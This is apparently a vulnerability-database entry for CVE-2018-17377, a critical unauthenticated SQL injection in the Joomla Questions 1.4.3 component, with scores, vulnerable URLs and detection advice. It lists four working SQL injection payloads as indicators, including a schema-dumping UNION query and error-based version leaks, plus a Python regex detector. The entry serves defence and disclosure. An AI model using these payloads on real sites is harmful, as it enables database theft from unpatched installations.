CVE-2018-17377
published 2018-09-28

CVE-2018-17377: SQL Injection exists in the Questions 1.4.3 component for Joomla! via the term, userid, users, or groups parameter.

Priority: P266 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.21% (86.6th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
extensiondeveloper | questions | - | -

Detection & IOCs (extracted from sources)

url: index.php?option=com_questions&tmpl=component&task=quazax.getusers&term=[SQL]
url: index.php?option=com_questions&tmpl=component&task=quazax.sendnotification&userid=[SQL]&users=[SQL]&groups=[SQL]
url: index.php?option=com_questions&tmpl=component&task=quazax.addnewgroup&group_name=[SQL]
command: 66' UNION ALL SELECT NULL,NULL,CONCAT((SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x))--+-
command: 66' AND (SELECT 8948 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(8948=8948,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Efe
command: 66 OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),(SELECT (ELT(1=1,1))),0x7e7e496873616e53656e63616e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
command: %27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d
  • Monitor HTTP requests targeting the Joomla com_questions component across three vulnerable tasks: quazax.getusers (term parameter), quazax.sendnotification (userid, users, groups parameters), and quazax.addnewgroup (group_name parameter) for SQL injection payloads.
  • Detect requests to index.php containing 'option=com_questions' combined with 'task=quazax.getusers', 'task=quazax.sendnotification', or 'task=quazax.addnewgroup' as indicators of exploitation attempts against this component.
  • Look for UNION-based and error-based (FLOOR(RAND(0)*2) GROUP BY) SQL injection patterns in query parameters of com_questions requests, particularly referencing INFORMATION_SCHEMA.SCHEMATA or INFORMATION_SCHEMA.PLUGINS.
  • Detect URL-encoded MySQL versioned comment injection (/*!50000Procedure*/ / /*!50000Analyse*/) in the group_name parameter of quazax.addnewgroup requests, as used in the third POC payload.
  • All POC URLs use 'localhost' as the host and '[PATH]' as a placeholder; replace with the actual target host and Joomla installation path when writing detection signatures.
  • The vulnerability is specific to Questions component version 1.4.3 for Joomla!; detections should be scoped to this component version to reduce false positives.
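
The detection guidance above, as an added Python example (not part of this entry or its sources): it decodes each request, matches the three com_questions tasks, and checks only the parameters named for each task. The marker regex, the function name classify and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Tasks and parameters named in this entry for com_questions 1.4.3.
TASK_PARAMS = {
    "quazax.getusers": ("term",),
    "quazax.sendnotification": ("userid", "users", "groups"),
    "quazax.addnewgroup": ("group_name",),
}

# Assumed marker set covering the payload families listed above: UNION-based,
# error-based (FLOOR(RAND(0)*2) ... GROUP BY), extractvalue, MySQL versioned
# comments, INFORMATION_SCHEMA references, quote and comment breakouts.
SQLI_MARKERS = re.compile(
    r"union\s+(all\s+)?select|information_schema|floor\s*\(\s*rand\s*\("
    r"|extractvalue\s*\(|/\*!\d{5}|concat(_ws)?\s*\(|'\s*(and|or)\b|--[\s+-]",
    re.IGNORECASE,
)

def classify(request_uri):
    """Return None (unrelated), ("task", task, []) or ("sqli", task, params)."""
    parts = urlsplit(request_uri)
    if not parts.path.lower().endswith("index.php"):
        return None
    # parse_qs percent-decodes once and maps '+' to a space, which also
    # undoes the character-by-character encoding of the fourth payload above.
    raw = parse_qs(parts.query, keep_blank_values=True)
    query = {k.lower(): v for k, v in raw.items()}
    if "com_questions" not in [v.lower() for v in query.get("option", [])]:
        return None
    task = (query.get("task") or [""])[0].lower()
    if task not in TASK_PARAMS:
        return None
    hits = [p for p in TASK_PARAMS[task]
            if any(SQLI_MARKERS.search(v) for v in query.get(p, []))]
    # "task" means the endpoint was reached without an injection marker.
    return ("sqli" if hits else "task", task, hits)

# Constructed request URIs (not captured traffic); the values are shortened
# fragments of the patterns listed above.
SAMPLE_REQUESTS = [
    "/index.php?option=com_questions&tmpl=component&task=quazax.getusers&term=alice",
    "/index.php?option=com_questions&tmpl=component&task=quazax.getusers&term=66%27+UNION+ALL+SELECT+NULL",
    "/joomla/index.php?option=com_questions&task=quazax.addnewgroup&group_name=%27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f",
    "/index.php?option=com_questions&task=quazax.sendnotification&userid=5&users=3&groups=1+OR+(SELECT+1+FROM+INFORMATION_SCHEMA.PLUGINS)",
    "/index.php?option=com_content&view=article&id=7",
]
```

A "task" result is worth logging on its own where the component is not in normal use; POST bodies would need the same check, since this sketch inspects the query string only.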

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P